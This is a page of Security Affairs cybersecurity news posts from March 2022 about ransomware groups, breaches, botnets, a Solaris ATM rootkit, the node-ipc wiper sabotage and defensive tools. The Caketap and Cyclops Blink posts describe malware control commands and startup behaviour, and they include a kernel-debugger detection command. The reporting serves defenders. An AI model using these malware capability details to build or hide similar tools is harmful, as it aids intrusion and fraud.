Security Affairs

Subscribe to Security Affairs feed
Read, think, share … Security is everyone's responsibility
Updated: 1 week 2 days ago

Avoslocker ransomware gang targets US critical infrastructure

Sat, 03/19/2022 - 13:03
The Federal Bureau of Investigation (FBI) reported that AvosLocker ransomware is being used in attacks targeting US critical infrastructure.

The Federal Bureau of Investigation (FBI) published a joint cybersecurity advisory warning of AvosLocker ransomware attacks targeting multiple US critical infrastructure.

The advisory was published in coordination with the US Treasury Department and the Financial Crimes Enforcement Network (FinCEN).

“AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including, but not limited to, the Financial Services, Critical Manufacturing, and Government Facilities sectors. AvosLocker claims to directly handle ransom negotiations, as well as the publishing and hosting of exfiltrated victim data after their affiliates infect targets.” reads the report published by the company. “As a result, AvosLocker indicators of compromise (IOCs) vary between indicators specific to AvosLocker malware and indicators specific to the individual affiliate responsible for the intrusion.”

The joint advisory includes indicators of compromise (IOCs) that network defenders can use to detect and block the threat.

The AvosLocker ransomware-as-a-service emerged in the threat landscape in September 2021, since January the group expanded its targets by implementing the support for encrypting Linux systems, specifically VMware ESXi servers.

AvosLocker operators already advertised in the past a Linux variant, dubbed AvosLinux, of their malware claiming it was able to support Linux and ESXi servers.

The AvosLocker ransomware appends the .avoslinux extension to the filenames of all the encrypted files, then drops ransom notes in each folder containing the encrypted files.

The alert revealed that in some cases, the AvosLocker ransomware operators targeted victims with phone calls encouraging them to go to the onion site to negotiate and threatens to leak the stolen data online. In some cases, the gang also threatened and conducted distributed denial-of-service (DDoS) attacks during negotiations.

The AvosLocker leak site claims to have hit victims in the United States, Syria, Saudi
Arabia, Germany, Spain, Belgium, Turkey, the United Arab Emirates, the United Kingdom,
Canada, China, and Taiwan.

In some cases, AvosLocker negotiators also threaten and launche distributed denial-of-service (DDoS) attacks during negotiations, likely when the victims are not cooperating, to convince them to comply with their demands.

The report also includes a list of mitigation measures to increase the resilience of company networks:

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
  • Implement network segmentation and maintain offline backups of data to ensure limited interruption to the organization.
  • Regularly back up data, password protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.
  • Install and regularly update antivirus software on all hosts, and enable real time detection.
  • Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.
  • Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
  • Audit user accounts with administrative privileges and configure access controls with least privilege in mind. Do not give all users administrative privileges.  Disable unused ports.
  • Consider adding an email banner to emails received from outside your organization.
  • Disable hyperlinks in received emails.
  • Use multifactor authentication where possible.
  • Use strong passwords and regularly change passwords to network systems and accounts, implementing the shortest acceptable timeframe for password changes.
  • Avoid reusing passwords for multiple accounts.
  • Require administrator credentials to install software.
  • Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.
  • Focus on cyber security awareness and training. Regularly provide users with training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities (i.e., ransomware and phishing scams).

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, AvosLocker ransomware)

The post Avoslocker ransomware gang targets US critical infrastructure appeared first on Security Affairs.

Categories: Cyber Security News

Crooks claims to have stolen 4TB of data from TransUnion South Africa

Sat, 03/19/2022 - 12:10
TransUnion South Africa discloses a data breach, threat actors who stolen sensitive data, demanded a ransom payment not to release stolen data.

TransUnion South Africa announced that threat actors compromised a company server based in South Africa using stolen credentials. Threat actors have stolen company data and demanded a ransom payment not to release stolen data.

As a precautionary measure, the company temporarily took part of its infrastructure offline.

“A criminal third party obtained access to a TransUnion South Africa server through misuse of an authorised client’s credentials. We have received an extortion demand and it will not be paid.” reads the statement published by the company.

TransUnion notified law enforcement and the country’s regulators.

The company has declared that it will not pay the ransom and hired cybersecurity and forensic experts to investigate the extent of the security breach.

The company believes the security breach only impacted an isolated server holding limited data from South African business.

“We are engaging clients in South Africa about this incident. As our investigation progresses, we will notify and assist individuals whose personal data may have been affected. We will be making identity protection products available to impacted consumers free of charge.” continues the statement.

“The security and protection of the information we hold is TransUnion’s top priority”, said Lee Naik, CEO TransUnion South Africa. “We understand that situations like this can be unsettling and TransUnion South Africa remains committed to assisting anyone whose information may have been affected.”

BleepingComputer reported that the Brazilian cybercrime group “N4ughtysecTU” has claimed responsibility for the attack and allegedly stolen 4TB of data.

The attackers claim to have hacked a poorly secured TransUnion SFTP server and stolen data related to 54 million customers.

The group told BleepingComputer that conducted a brute force attack on the SFTP server and breached an account using the password “Password.”

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Data breach)

The post Crooks claims to have stolen 4TB of data from TransUnion South Africa appeared first on Security Affairs.

Categories: Cyber Security News

Exotic Lily initial access broker works with Conti gang

Sat, 03/19/2022 - 09:15
Google’s Threat Analysis Group (TAG) uncovered a new initial access broker, named Exotic Lily, that is closely affiliated with the Conti ransomware gang.

Google’s Threat Analysis Group (TAG) researchers linked a new initial access broker, named Exotic Lily, to the Conti ransomware operation.

Initial access brokers play an essential role in the cybercrime ecosystem, they provide access to previously compromised organizations to threat actors.

Exotic Lily was first spotted on September 2021, at the time it was observed spreading human-operated Conti and Diavol ransomware.

“In early September 2021, Threat Analysis Group (TAG) observed a financially motivated threat actor we refer to as EXOTIC LILY, exploiting a 0day in Microsoft MSHTML (CVE-2021-40444). Investigating this group’s activity, we determined they are an Initial Access Broker (IAB) who appear to be working with the Russian cyber crime gang known as FIN12 (Mandiant, FireEye) / WIZARD SPIDER (CrowdStrike).” reads the post published by Google TAG.

The Exotic Lily cybercrime group is exploiting the Microsoft Windows MSHTML flaw (CVE-2021-40444) in its phishing campaigns. Experts observed the threat actors sending at a peak of its activity more than 5,000 business proposal-themed emails a day to 650 targeted entities worldwide.

The attack chain associated with the EXOTIC LILY threat actors remained relatively consistent throughout the time, Google TAG researchers explained.

Threat actors use the technique of domain and identity spoofing to gain “additional credibility” with a targeted organization.

The Exotic Lily used spoofed email accounts to send social engineering lures to organizations in multiple industries and establish a trusted contact with targeted entities.

Exotic Lily also used the built-in email notification feature implemented by legitimate file-sharing services (i.e. WeTransfer, TransferNow and OneDrive) to share links to malicious files with the victims evading the detection.

In March, the group was observed delivering ISO files, but with a DLL containing the custom loader BUMBLEBEE. BUMBLEBEE uses WMI to collect the target’s system information, including OS version, user name and domain name. BUMBLEBEE was also observed to fetch Cobalt Strike payloads.

The analysis of the threat actor’s communications revealed that the group works from 9-to-5, with very little activity during the weekends. The actor’s working hours suggest they might be working from a Central or an Eastern Europe timezone.

An analysis of the Exotic Lily’s communication activity indicates that the threat actors have a “typical 9-to-5 job” on weekdays and may be possibly working from a Central or an Eastern Europe time zone.

“We believe the shift to deliver BazarLoader, along with some other indicators such as a unique Cobalt Strike profile (described by RiskIQ) further confirms the existence of a relationship between EXOTIC LILY and actions of a Russian cyber crime group tracked as WIZARD SPIDER (CrowdStrike), FIN12 (Mandiant, FireEye) and DEV-0193 (Microsoft).” the researchers concluded. “While the nature of those relationships remains unclear, EXOTIC LILY seems to operate as a separate entity, focusing on acquiring initial access through email campaigns, with follow-up activities that include deployment of Conti and Diavol ransomware, which are performed by a different set of actors.”

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Conti)

The post Exotic Lily initial access broker works with Conti gang appeared first on Security Affairs.

Categories: Cyber Security News

Emsisoft releases free decryptor for the victims of the Diavol ransomware

Sat, 03/19/2022 - 06:51
Cybersecurity firm Emsisoft released a free decryptor that allows the victims of the Diavol ransomware to recover their files without paying a ransom.

Cybersecurity firm Emsisoft has released a free decryption tool to help Diavol ransomware victims recover their files without paying a ransom.

In January, the FBI officially linked the Diavol ransomware operation to the infamous TrickBot gang, the group that is behind the TrickBot banking trojan.

TrickBot is a popular banking Trojan that has been around since October 2016, its authors have continuously upgraded it by implementing new features. Operators continue to offer the botnet through a multi-purpose malware-as-a-service (MaaS) model. Threat actors leverage the botnet to distribute a broad range of malware including info-stealer and ransomware such as Conti and Ryuk. To date, the Trickbot botnet has already infected more than a million computers.

The TrickBot Gang is also behind the development of the BazarBackdoor and Anchor backdoors.

In July, researchers from Fortinet first spotted the new ransomware family, tracked as Diavol, and speculated it might have been developed by Wizard Spider, the cybercrime gang behind the TrickBot botnet.

Fortinet experts noticed similarities between Diavol and Conti threats, but unlike Conti, Diavol doesn’t avoid infecting Russian victims.

In August 2021, IBM X-Force researchers conducted a new analysis of an old variant of the threat that unlike the one analyzed by Fortinet experts appears to be a development version used for testing purposes.

The comparison of the two versions allowed the researchers to get insight into the development process of Diavol and of future versions of the malware.

The analysis conducted by IBM X-Force researchers reinforced the link between Diavol ransomware and the TrickBot malware.

The free decryptor for the Diavol ransomware released by Emsisoft can be downloaded here, the company also released a guide for the tool.

“The decryptor requires access to a file pair consisting of one encrypted file and the original, unencrypted
version of the encrypted file to reconstruct the encryption keys needed to decrypt the rest of your data.
This file must be roughly 20KB or larger in size. Please do not change the file names of the original and
encrypted files, as the decryptor may perform file name comparisons to determine the correct file
extension used for encrypted files on your system.” reads the guide for the decryptor.

Experts pointed out that the decryptor can’t guarantee that the decrypted data is identical to the one that was previously encrypted because the ransomware does not save any information about the unencrypted files.

Experts warn that due to technical limitations, this decryptor may not be able to decrypt files larger than the file pair you provided.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Diavol ransomware)

The post Emsisoft releases free decryptor for the victims of the Diavol ransomware appeared first on Security Affairs.

Categories: Cyber Security News

China-linked threat actors are targeting the government of Ukraine

Fri, 03/18/2022 - 17:12
Google’s TAG team revealed that China-linked APT groups are targeting Ukraine ’s government for intelligence purposes.

Google’s Threat Analysis Group (TAG) researchers uncovered cyberespionage operations conducted by the Chinese People’s Liberation Army (PLA) and other China-linked APT groups and that targeted Ukraine ‘s government to gather info on the ongoing conflict. Below is the tweet published by TAG chief, Shane Huntley, who cited the Google TAG Security Engineer Billy Leonard.

“It should come as no surprise that CN PLA and other CN intel orgs are acutely interested in the war in Ukraine. Over the last few weeks @Google TAG has identified a govt backed actor from CN targeting Ukrainian govt orgs, and we provided notifications to impacted parties.” wrote Leonard.

The Ukraine war isn’t only attracting interest from European threat actors. China is working hard here too. https://t.co/8bpXsGQvD7

— Shane Huntley (@ShaneHuntley) March 15, 2022

Google TAG team notified Ukrainian government organizations that were targeted by Chinese intelligence.

“Over the last few weeks Google TAG has identified a govt backed actor from CN targeting Ukrainian govt orgs, and we provided notifications to impacted parties,” Leonard said.

It should come as no surprise that CN PLA and other CN intel orgs are acutely interested in the war in Ukraine. Over the last few weeks @Google TAG has identified a govt backed actor from CN targeting Ukrainian govt orgs, and we provided notifications to impacted parties. https://t.co/WALjGL6v5Z

— billy leonard (@billyleonard) March 15, 2022

While our priority is providing notifications to impacted parties, we've provided related IOCs to community partners, and we will publish more details for the security community in the near future. We will continue to update our recent blog as necessary.https://t.co/5ZJUgz3Snt

— billy leonard (@billyleonard) March 15, 2022

The hacktivist collective group Intrusion Truth believes that the campaign was orchestrated directly by the Chinese government. The group announced that it is sharing IOCs with community partners and plan to provide additional details on the ongoing attacks in the future.

Google recently announced to have blocked a phishing campaign originating conducted by China-linked cybereaspionage group APT31 (aka Zirconium, Judgment Panda, and Red Keres) and aimed at Gmail users associated with the U.S. government.

Google also reported that China-linked Mustang Panda cyberespionage group (aka Temp.Hex) have targeted European entities with lures related to the Ukrainian invasion. In some attacks spotted by Google, threat actors used malicious attachments with file names such as ‘Situation at the EU borders with Ukraine.zip’. The researchers pointed out that this is the first time they observed Mustang Panda targeting European entities, the group was regularly observed targeting Southeast Asian organizations.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Ukraine)

The post China-linked threat actors are targeting the government of Ukraine appeared first on Security Affairs.

Categories: Cyber Security News

Caketap, a new Unix rootkit used to siphon ATM banking data

Fri, 03/18/2022 - 11:41
Experts spotted a new Unix rootkit, called Caketap, that was used to steal ATM banking data.

Mandiant researchers discovered a new Unix rootkit named Caketap, which is used to steal ATM banking data, while investigating the activity of the LightBasin cybercrime group (aka UNC1945).

The China-linked hacking group has been active since at least 2016, according to the CrowdStrike researchers it is using a very sophisticated toolset. CrowdStrike researchers reported that at least 13 telecommunication companies were compromised by the group since 2019.

The group hacked mobile telephone networks around the globe and used specialized tools to access calling records and text messages from telecommunications companies.

Now Mandiant researchers documented the activity associated with LightBasin targeting bank customers and focusing on card frauds.

The Caketap rootkit is a Unix kernel module that the UNC2891 threat actor deployed on server running Oracle Solaris. CAKETAP can operate in stealthy mode by hiding network connections, processes, and files. Upon its initialization, the malware removes itself from the loaded modules list and updates the last_module_id with the previously loaded module to delete any trace of its presence.

In order to identify CAKETAP running on a Solaris system, administrators can check for the presence of a hook installed in the ipcl_get_next_conn hook function.

Below is an example command to identify a hooked ipcl_get_next_conn function:

[email protected]:~# echo ‘ipcl_get_next_conn::dis -n 0 ; ::quit’ | mdb -k

The output in a clean SPARC Solaris system would look similar to the following:

ipcl_get_next_conn: save %sp, -0xb0, %sp

Mandiant researchers reported that the rootkit supports the following commands:

CommandFunctionEmptyAdd the CAKETAP module back to loaded modules listMChange the signal string for the getdents64 hookIAdd a network filter (format <IP>p<PORT>)iRemove a network filterPSet the current thread TTY to not be filtered by the getdents64 hookpSet all TTYs to be filtered by the getdents64 hookSDisplays the current configuration

Caketap was designed to intercept banking card and PIN verification data from compromised ATM switch servers and carry out unauthorized transactions.

“Memory forensics from one victim’s ATM switch server revealed a variant of CAKETAP with additional network hooking functionality that intercepted specific messages relating to card and pin verification. Evidence suggests that this variant of CAKETAP was used as part of an operation to perform unauthorized transactions using fraudulent bank cards.” reads the analysis published by Mandiant. “This CAKETAP variant targeted specific messages destined for the Payment Hardware Security Module (HSM).”

Caketap allows the manipulation of card verification messages and reply PIN verification messages.

Then the malware saves valid messages that match non-fraudulent PANs (Primary Account Numbers) internally and sends them to the HSM to avoid impacting legitimate customer transactions and arise suspicion.

“Based on Mandiant’s investigation findings, we believe that CAKETAP was leveraged by UNC2891 as part of a larger operation to successfully use fraudulent bank cards to perform unauthorized cash withdrawals from ATM terminals at several banks.” concludes the report. “UNC2891 maintains a high level of OPSEC and employs several techniques to evade detection. The actor uses their skill and experience to take full advantage of the decreased visibility and security measures that are often present in Unix and Linux environments. Mandiant expects that UNC2891 will continue to capitalize on this and perform similar operations for financial gain that target mission critical systems running these operating systems.”

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Caketap)

The post Caketap, a new Unix rootkit used to siphon ATM banking data appeared first on Security Affairs.

Categories: Cyber Security News

Red TIM Research (RTR) team discovers a bug on Ericsson Network Manager

Fri, 03/18/2022 - 10:38
TIM Red Team Research (RTR) researchers discovered a new flaw on Ericsson Network Manager, aka Ericsson flagship network product.

TIM Red Team Research (RTR) team discovered a new vulnerability affecting Ericsson Network Manager, which is known as Ericsson flagship network product.

Ericsson Network Manager and network OSS

As mentioned, we’re talking about an Ericsson flagship network product, it enables mobile radio network management, and their related evolutions, ensuring the conventional out-of-the-box, as well as all cloud-based technologies evenly (ready to manage the transition from 4G to 5G and continuously updated to be ready for the next technological innovation).

In fact, Ericsson Network Manager is an Operations support system (‘OSS’ according to network jargon), which allows the management of all the devices interconnected to it, ensuring the management of configurations, firmware updates and all automation and maintenance operations of an advanced mobile radio network.

It also allows the management of advanced virtual network functions (VNFM), combined with automatic analysis and scaling capabilities based on criteria that interact with various standard distributions.

The system is therefore scalable and provides high capacity through an implementation that allows the consolidation of existing OSS sites to grow or manage greater complexity.

Research Activity

The vulnerabilities have been isolated in TIM laboratory, where the bug hunters Alessandro Bosco, Mohamed Amine Ouad led by Massimiliano Brolli who’sin charge of the project, as reported on the project website, started the Coordinated Vulnerability Disclosure (CVD) with Ericsson.

According to TIM website, the CVE-2021-28488 has been issued, which focuses on the CWE Exposure of Resource to Wrong Sphere. MITRE describes the security issues encountered, as described down below:

Ericsson Network Manager (ENM) before 21.2 has incorrect access-control behavior (that only affects the level of access available to persons who were already granted a highly privileged role). Users in the same AMOS authorization group can retrieve managed-network that was not set to be accessible to the entire group (i.e., was only set to be accessible to a subset of that group).

TIM Red Team Research

We are talking about one of the few Italian centers of industrial research about security bugs, where since few years are performed “bug hunting” activities that aim to search for undocumented vulnerabilities, leading to a subsequent issuance of a Common Vulnerabilities and Exposures (CVE) on the National Vulnerability Database of the United States of America, once the Coordinated Vulnerability Disclosure (CVD) with the Vendor is over.

In two years of activity, the team has detected many 0-days on very popular products of big vendors, such as Oracle, IBM, Ericsson, Nokia, Computer Associates, Siemens, QNAP, Johnson & Control, Schneider Electric, as well as other vendors on different types of software architectures.

Speaking about a vulnerability detected on Johnson & Control’s Metasys Reporting Engine (MRE) Web Services Product, Cybersecurity and Infrastructure Security Agency (CISA) of the United States of America issued a specific Security Bulletin reporting as Background the following sectors: “CRITICAL INFRASTRUCTURE SECTORS, COUNTRIES/ AREAS USED and COMPANY HEADQUARTERS”. It is an all-Italian reality that issues a CVE every 6 working days, internationally contributing to the research for undocumented vulnerabilities, contributing to the security of the products used by many organizations and several individuals

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Ericsson Network Manager)

The post Red TIM Research (RTR) team discovers a bug on Ericsson Network Manager appeared first on Security Affairs.

Categories: Cyber Security News

Russia-linked Cyclops Blink botnet targeting ASUS routers

Fri, 03/18/2022 - 08:43
The recently discovered Cyclops Blink botnet, which is believed to be a replacement for the VPNFilter botnet, is now targeting the ASUS routers.

The recently discovered Cyclops Blink botnet is now targeting the ASUS routers, reports Trend Micro researchers.

The Cyclops Blink malware has been active since at least June 2019, it targets WatchGuard Firebox and other Small Office/Home Office (SOHO) network devices. According to WatchGuard, Cyclops Blink may have affected roughly 1% of all active WatchGuard firewall appliances.

In February, US and UK cybersecurity and law enforcement agencies published a joint security advisory about the Cyclops Blink bot that has been linked to the Russian-backed Sandworm APT group.

Sandworm (aka BlackEnergy and TeleBots) has been active since 2000, it operates under the control of Unit 74455 of the Russian GRU’s Main Center for Special Technologies (GTsST).

The group is also the author of the NotPetya ransomware that hit hundreds of companies worldwide in June 2017, causing billions worth of damage.

Cyclops Blink is believed to be a replacement for the VPNFilter botnet, which was first exposed in 2018 and at the time was composed of more than 500,000 compromised routers and network-attached storage (NAS) devices.

“Our data also shows that although Cyclops Blink is a state-sponsored botnet, its C&C servers and bots affect WatchGuard Firebox and Asus devices that do not belong to critical organizations, or those that have an evident value on economic, political, or military espionage.” reads the advisory published by TrendMicro. “Hence, we believe that it is possible that the Cyclops Blink botnet’s main purpose is to build an infrastructure for further attacks on high-value targets.”

Cyclops Blink is nation-state botnet with a modular architecture, it is written in the C language. Upon executing the core component, the malware first checks if its executable file name starts with “[k”. If it does not, it performs the following routine: 

  1. It redirects both stdout and stderr file descriptors to /dev/null. 
  2. It sets the default handlers for SIGTERM, SIGINT, SIGBUS, SIGPIPE, and SIGIO signals. 
  3. It reloads itself with a new “[ktest]” process name. 

Then the bot waits for 37 seconds before it sets up its hard-coded parameters, including the hard-coded C2 servers and the interval that should be used to communicate with them. 

For every hard-coded TCP port used to communicate with the C2 servers, the bot creates a rule in the Linux kernel firewall Netfilter.

Since June 2019, the malware indicted WatchGuard devices and Asus routers in many countries, including in the U.S., India, Italy, Canada, and Russia. Experts pointed out that these victims do not appear to be evidently valuable targets for either economic, military, or political espionage. Trend Micro observed that some of the live C&Cs are hosted on WatchGuard devices used by a law firm in Europe, a medium-sized company producing medical equipment for dentists in Southern Europe and a plumber in the United States. 

Experts warn of an increase of IoT attacks on a global scale, making internet routers one of the primary targets.

“Once an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying, or anything else that the attacker wants to do. The underlying operating systems for the majority of IoT devices is Linux, which is also used by many powerful systems tools. This can allow attackers to add anything else that they might need to complete their attacks.” concludes the report. “In the case of Cyclops Blink, we have seen devices that were compromised for over 30 months (about two and a half years) in a row and were being set up as stable C&C servers for other bots. “

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Cyclops Blink)

The post Russia-linked Cyclops Blink botnet targeting ASUS routers appeared first on Security Affairs.

Categories: Cyber Security News

Microsoft releases open-source tool for checking MikroTik Routers compromise

Fri, 03/18/2022 - 02:32
Microsoft released an open-source tool to secure MikroTik routers and check for indicators of compromise for Trickbot malware infections.

Microsoft has released an open-source tool, dubbed RouterOS Scanner, that can be used to secure MikroTik routers and check for indicators of compromise associated with Trickbot malware infections.

“This analysis has enabled us to develop a forensic tool to identify Trickbot-related compromise and other suspicious indicators on MikroTik devices. We published this tool to help customers ensure these IoT devices are not susceptible to these attacks.” reads the post published by Microsoft.

Recently Check Point researchers reported that the infamous TrickBot malware was employed in attacks against customers of 60 financial and technology companies with new anti-analysis features. The news wave of attacks aimed at cryptocurrency firms, most of them located in the U.S..

TrickBot is a popular Windows banking Trojan that has been around since October 2016, its authors have continuously upgraded it by implementing new features, including powerful password-stealing capabilities.

TrickBot initially partnered with Ryuk ransomware that used it for initial access in the network compromised by the botnet. Then Ryuk was replaced by Conti Ransomware gang who has been using Trickbot for the same purpose.

In 2021, the Conti gang used in exclusive the TrickBot to achieve initial accesses in the network of organizations worldwide.

AdvInt researchers recently reported that The Conti ransomware group has taken over TrickBot malware operation and plans to replace it with BazarBackdoor malware.

The Trickbot operation has switched to using MikroTik routers as C&C servers since 2020.

Microsoft has analyzed how the malware compromised MikroTik routers and developed a tool to detect signs of compromise. The attack chain against the routers starts with brute-force attacks or by exploiting the CVE-2018-14847 flaw that allows reading a file that contains passwords.

“The attackers then issue a unique command that redirects traffic between two ports in the router, establishing the line of communication between Trickbot-affected devices and the C2,” continues the post. “MikroTik devices have unique hardware and software, RouterBOARD and RouterOS. This means that to run such a command, the attackers need expertise in RouterOS SSH shell commands.”

RouterOS Scanner allows users to check the device version and maps it to known vulnerabilities. It also looks for scheduled tasks, traffic redirection rules (NAT and other rules), DNS cache poisoning, default port changes, non-default users, suspicious files, as well as proxy, SOCKS and firewall rules.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, RouterOS Scanner)

The post Microsoft releases open-source tool for checking MikroTik Routers compromise appeared first on Security Affairs.

Categories: Cyber Security News

node-ipc NPM Package sabotage to protest Ukraine invasion

Thu, 03/17/2022 - 20:16
The developer behind the popular “node-ipc” NPM package uploaded a destructive version to protest Russia’s invasion of Ukraine.

RIAEvangelist, the developer behind the popular “node-ipc” NPM package, shipped a new version that wipes Russia, Belarus systems to protest Russia’s invasion of Ukraine.

The Node-ipc node module allows local and remote inter-process communication with support for Linux, macOS, and Windows. It has over 1 million weekly downloads.

Versions 10.1.1 and 10.1.2 of the library wipe the content of arbitrary files and replace it with a heart emoji.

The attack was spotted on March 15, 2022, when users of the popular Vue.js frontend JavaScript framework started experiencing the effect of the sabotage.

“This was the result of the nested dependencies node-ipc and peacenotwar being sabotaged as an act of protest by the maintainer of the node-ipc package. This security incident involves destructive acts of corrupting files on disk by one maintainer and their attempts to hide and restate that deliberate sabotage in different forms. While this is an attack with protest-driven motivations, it highlights a larger issue facing the software supply chain: the transitive dependencies in your code can have a huge impact on your security.” reads the analysis published by security firm Synk. “A very clear abuse and a critical supply chain security incident will occur for any system on which this NPM package will be called upon, if that matches a geo-location of either Russia or Belarus.”

Experts tracked the problem with the CVE-2022-23812, further investigation revealed that the wiping behavior was implemented on March 7 (version 10.1.1), and a second update took place 10 hours later (version 10.1.1).

The wiper code was removed from the package with release 10.1.3. Later RIAEvangelist released a major update (version 11.0.0), which imported another dependency called “peacenotwar” released as form of “non-violent protest against Russia’s aggression.”

“This code serves as a non-destructive example of why controlling your node modules is important. It also serves as a non-violent protest against Russia’s aggression that threatens the world right now. This module will add a message of peace on your users’ desktops, and it will only do it if it does not already exist just to be polite.” reads the description for the code.

“Any time the node-ipc module functionality gets called, it prints to STDOUT a message taken out of the peacenotwar module, as well as places a file on the user’s Desktop directory with contents relating to the current war-time situation of Russia and Ukraine,” continues the analusis.

Version node-ipc 11.1.0 released on March 15, 2022 imports the “peacenotwar” package version from 9.1.3 to 9.1.5 and bundles the “colors” NPM library, while it doesn’t include the STDOUT console messages.

Researchers noticed that npm package colors, and faker have been intentionally abused and corrupted by its npm package maintainer Marak in January.

This mode of protest opens up disturbing scenarios, activists could exploit other supply chain attacks to compromise and destroy target systems.

“Snyk stands with Ukraine and we’ve proactively acted to support the Ukrainian people during the on-going crisis with donations and free service to developers world-wide, as well as taking action to cease business in Russia and Belarus.” conclude the experts.”That said, intentional abuse such as this undermines the global open source community and requires us to flag impacted versions of node-ipc as security vulnerabilities.”

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, node-ipc)

The post node-ipc NPM Package sabotage to protest Ukraine invasion appeared first on Security Affairs.

Categories: Cyber Security News

SolarWinds Warns of Attacks Targeting Web Help Desk Users

Thu, 03/17/2022 - 10:45
SolarWinds warns customers of potential cyberattacks targeting unpatched installs of its Web Help Desk (WHD) product.

SolarWinds has published a security advisory to warn customers of the risk of cyberattacks targeting unpatched Web Help Desk (WHD) installs.

The WHD is described by SolarWinds as an affordable Help Desk Ticketing and Asset Management Software.

SolarWinds declared that one of its customers was the victim of an external attempted attack on their instance of WHD. The attack was blocked by the customer’s endpoint detection and response (EDR) system. The vendor immediately launched an investigation into the hacking attempt.

“A SolarWinds customer reported an external attempted attack on their instance of Web Help Desk (WHD) 12.7.5. The customer’s endpoint detection and response (EDR) system blocked the attack and alerted the customer to the issue.” reads the Advisory published by SolarWinds. “In an abundance of caution, SolarWinds recommends all Web Help Desk customers whose WHD implementation is externally facing to remove it from your public (internet-facing) infrastructure until we know more. If you are not able to remove it from your public infrastructure at this time, we recommend you ensure you have EDR software deployed, and are monitoring the WHD instance.”

The Unauthenticated Access issue impacts only WHD version 12.7.5 which was released in May 2021. The company recommends disconnecting their WHD (version 12.7.5) installs from the Internet or protecting it with the deployment of an EDR solution.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, WHD)

The post SolarWinds Warns of Attacks Targeting Web Help Desk Users appeared first on Security Affairs.

Categories: Cyber Security News

Ukraine SBU arrested a hacker who supported Russia during the invasion

Thu, 03/17/2022 - 08:50
The Security Service of Ukraine (SBU) announced the arrest of a “hacker” who helped Russian Army during the invasion.

The Security Service of Ukraine (SBU) announced to have arrested a hacker who provided technical support to Russian troops during the invasion, the man provided mobile communication services inside the Ukrainian territory.

The man has broadcasted text messages to Ukrainian officials asking them to lay down the weapons and join Russia.

“Sbu arrested a hacker who provided the invaders with a cellular connection in Ukraine” reads the SBU’s announcement. “With the help of this collaborator the enemy:”

  • made anonymous phone calls from Russia to zagarbnikív’s mobile phones in Ukraine;
  • sent an SMS to the Ukrainian security forces and public officials offering to surrender and join to the invaders;
  • transferred commands to different Russian groups.

“The hacker allowed to make up to a thousand calls in one day. Many of them are from the top leadership of the enemy army,”

